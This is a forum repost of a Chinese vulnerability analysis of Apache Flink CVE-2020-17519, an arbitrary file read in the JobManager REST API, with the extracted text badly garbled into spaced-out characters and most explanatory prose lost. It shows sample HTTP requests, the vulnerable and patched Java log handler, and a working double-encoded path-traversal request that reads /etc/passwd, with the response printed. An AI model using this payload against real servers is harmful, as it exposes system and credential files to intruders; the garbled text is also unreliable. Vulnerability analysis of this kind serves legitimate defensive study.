搜索

[28726] 2021-01-12_漏洞分析-ApacheFlink任意文件读取漏洞(CVE-2020-17519)

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-19
2021-01-12_漏洞分析-ApacheFlink任意文件读取漏洞(CVE-2020-17519)   -   A p a c h e   F l i n k   ( C V E - 2 0 2 0 - 1 7 5 1 9 ) a r r 0 w 1   O t s   2 0 2 1 - 0 1 - 1 2 A p a c h e   F l i n k h t t p s : / / f l i n k . a p a c h e . o r g / A p a c h e F l i n k ® A p a c h e   F l i n k F l i n k R E S T   A P I h t t p s : / / c i . a p a c h e . o r g / p r o j e c t s / f l i n k / f l i n k - d o c s - s t a b l e / o p s / r e s t _ a p i . h t m l # j o b m a n a g e r - l o g s F l i n k A P I A P I F l i n k 使 A P I R E S T - f u l   A P I H T T P J S O N 使 使 R E S T   A P I A P I A P I   J o b M a n a g e r 1 1   ( j s o n / j o b m a n a g e r / l o g s G E T   j o b m a n a g e r / l o g s   H T T P / 1 . 1 H o s t :   1 0 . 1 . 1 . 3 : 8 0 8 1 C a c h e - C o n t r o l :   m a x - a g e = 0 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e C o n n e c t i o n :   c l o s e
H T T P / 1 . 1   2 0 0   O K C o n t e n t - T y p e :   a p p l i c a t i o n / j s o n ;   c h a r s e t = U T F - 8 A c c e s s - C o n t r o l - A l l o w - O r i g i n :   * c o n t e n t - l e n g t h :   1 0 3 1 {     " l o g s " :   [         {             " n a m e " :   " f l i n k - w o r k - t a s k e x e c u t o r - 0 - i n s t a n c e - d e m o . t e s t . o u t . 3 " ,             " s i z e " :   0         } ,         {             " n a m e " :   " f l i n k - w o r k - s t a n d a l o n e s e s s i o n - 0 - i n s t a n c e - d e m o . t e s t . l o g " ,             " s i z e " :   1 2 3 1 2 6         } ,         {             " n a m e " :   " f l i n k - w o r k - t a s k e x e c u t o r - 0 - i n s t a n c e - d e m o . t e s t . l o g . 1 " ,             " s i z e " :   1 9 9 9 1         } ,         {             " n a m e " :   " f l i n k - w o r k - t a s k e x e c u t o r - 0 - i n s t a n c e - d e m o . t e s t . l o g . 2 " ,             " s i z e " :   1 8 6 5 1         } ,         {             " n a m e " :   " f l i n k - w o r k - t a s k e x e c u t o r - 0 - i n s t a n c e - d e m o . t e s t . o u t " ,             " s i z e " :   0         } ,         {             " n a m e " :   " f l i n k - w o r k - s t a n d a l o n e s e s s i o n - 0 - i n s t a n c e - d e m o . t e s t . o u t " ,             " s i z e " :   0         } ,         {             " n a m e " :   " f l i n k - w o r k - s t a n d a l o n e s e s s i o n - 0 - i n s t a n c e - d e m o . t e s t . o u t . 1 " ,             " s i z e " :   0         } ,         {             " n a m e " :   " f l i n k - w o r k - s t a n d a l o n e s e s s i o n - 0 - i n s t a n c e - d e m o . t e s t . l o g . 1 " ,             " s i z e " :   1 8 9 1 0         } ,         {             " n a m e " :   " f l i n k - w o r k - t a s k e x e c u t o r - 0 - i n s t a n c e - d e m o . t e s t . l o g " ,             " s i z e " :   1 8 4 4 3         } ,         {             " n a m e " :   " f l i n k - w o r k - t a s k e x e c u t o r - 0 - i n s t a n c e - d e m o . t e s t . o u t . 2 " ,             " s i z e " :   0         } ,         {             " n a m e " :   " f l i n k - w o r k - t a s k e x e c u t o r - 0 - i n s t a n c e - d e m o . t e s t . o u t . 1 " ,             " s i z e " :   0         } ,         {             " n a m e " :   " f l i n k - w o r k - t a s k e x e c u t o r - 0 - i n s t a n c e - d e m o . t e s t . l o g . 3 " ,             " s i z e " :   1 8 1 6 0         }     ] }
2 2 h t t p s : / / l i s t s . a p a c h e . o r g / t h r e a d . h t m l / r 6 8 4 3 2 0 2 5 5 6 a 6 d 0 b c e 9 6 0 7 e b c 0 2 e 3 0 3 f 6 8 f c 8 8 e 9 0 3 8 2 3 5 5 9 8 b d e 3 b 5 0 d @ % 3 C a n n o u n c e . a p a c h e . o r g % 3 E C V E - 2 0 2 0 - 1 7 5 1 9 A p a c h e   F l i n k R E S T   A P I 3     A p a c h e   F l i n k   1 . 1 1 . 0 1 . 1 1 . 1 1 . 1 1 . 2 J o b M a n a g e r R E S T J o b M a n a g e r 访 J o b M a n a g e r 访 J o b M a n a g e r G E T   j o b m a n a g e r / l o g s / f l i n k - w o r k - s t a n d a l o n e s e s s i o n - 0 - i n s t a n c e - d e m o . t e s t . l o g   H T T P / 1 . 1 H o s t :   1 0 . 1 . 1 . 3 : 8 0 8 1 C a c h e - C o n t r o l :   m a x - a g e = 0 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e C o n n e c t i o n :   c l o s e H T T P / 1 . 1   2 0 0   O K C o n t e n t - T y p e :   t e x t / p l a i n c o n t e n t - l e n g t h :   1 4 9 1 0 2 0 2 1 - 0 1 - 0 4   1 4 : 5 8 : 0 5 , 4 7 0   I N F O     (   ) 1 . 1 1 . 0 1 . 1 1 . 1 1 . 1 1 . 2
1 . 1 1 . 3 1 . 1 2 . 0 a p a c h e   /   f l i n k m a s t e r c o m m i t   b 5 6 1 0 1 0 b 0 e e 7 4 1 5 4 3 c 3 9 5 3 3 0 6 0 3 7 f 0 0 d 7 a 9 f 0 8 0 1 A n t   S e c u r i t y   F G   L a b 0 r i c h 1 h t t p s : / / g i t h u b . c o m / a p a c h e / f l i n k / c o m m i t / b 5 6 1 0 1 0 b 0 e e 7 4 1 5 4 3 c 3 9 5 3 3 0 6 0 3 7 f 0 0 d 7 a 9 f 0 8 0 1 f l i n k - r u n t i m e   /   s r c   /   m a i n   /   j a v a   /   o r g   /   a p a c h e   /   f l i n k   /   r u n t i m e   /   r e s t   /   h a n d l e r   /   c l u s t e r   /   J o b M a n a g e r C u s t o m L o g H a n d l e r . j a v a / / 1 2                 S t r i n g     f i l e n a m e     =     h a n d l e r R e q u e s t   g e t P a t h P a r a m e t e r   L o g F i l e N a m e P a t h P a r a m e t e r   ;                     =     h a n d l e r R e q u e s t   g e t P a t h P a r a m e t e r   L o g F i l e N a m e P a t h P a r a m e t e r   g e t N a m e   ; 使 p a t h h t t p s   : / / g i t h u b . c o m / a p a c h e / f l i n k / b l o b / 9 7 b f d 0 4 9 9 5 1 f 8 d 5 2 a 2 e 0 a e d 1 4 2 6 5 0 7 4 c 4 2 5 5 e a d 0 / f l i n k - r u n t i m e / s r c / m a i n / j a v a / o r g / a p a c h e / f l i n k / r u n t i m e / r e s t / h a n d l e r / c l u s t e r / J o b M a n a g e r C u s t o m L o g H a n d l e r . j a v a F i l e @ O v e r r i d e         p r o t e c t e d   F i l e   g e t F i l e ( H a n d l e r R e q u e s t < E m p t y R e q u e s t B o d y ,   F i l e M e s s a g e P a r a m e t e r s >   h a n d l e r R e q u e s t )   {                 i f   ( l o g D i r   = =   n u l l )   {                         r e t u r n   n u l l ;                 }                 / /   w r a p p i n g   a r o u n d   a n o t h e r   F i l e   i n s t a n t i a t i o n   i s   a   s i m p l e   w a y   t o   r e m o v e   a n y   p a t h   i n f o r m a t i o n                 / /   -   w e ' r e                 / /   s o l e l y   i n t e r e s t e d   i n   t h e   f i l e n a m e                 S t r i n g   f i l e n a m e   =                                 n e w   F i l e ( h a n d l e r R e q u e s t . g e t P a t h P a r a m e t e r ( L o g F i l e N a m e P a t h P a r a m e t e r . c l a s s ) ) . g e t N a m e ( ) ;                 r e t u r n   n e w   F i l e ( l o g D i r ,   f i l e n a m e ) ;         } }
C V E - 2 0 2 0 - 1 7 5 1 9 A p a c h e   F l i n k R E S T   A P I     A p a c h e   F l i n k J o b M a n a g e r G E T   j o b m a n a g e r / l o g s / . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f e t c % 2 5 2 f p a s s w d H T T P / 1 . 1 H o s t :   1 0 . 1 . 1 . 3 : 8 0 8 1 C a c h e - C o n t r o l :   m a x - a g e = 0 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e C o n n e c t i o n :   c l o s e H T T P / 1 . 1   2 0 0   O K C o n t e n t - T y p e :   t e x t / p l a i n c o n t e n t - l e n g t h :   1 5 2 3 r o o t : x : 0 : 0 : r o o t : / r o o t : / b i n / b a s h 1 . 1 1 . 0 1 . 1 1 . 1 1 . 1 1 . 2 a r r 0 w 1 h t t p s : / / x z . a l i y u n . c o m / t / 8 9 9 2 ? s p m = 5 1 7 6 . 1 2 9 0 1 0 1 5 . 0 . i 1 2 9 0 1 0 1 5 . a 2 b 4 5 2 5 c S C J X 3 Z

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理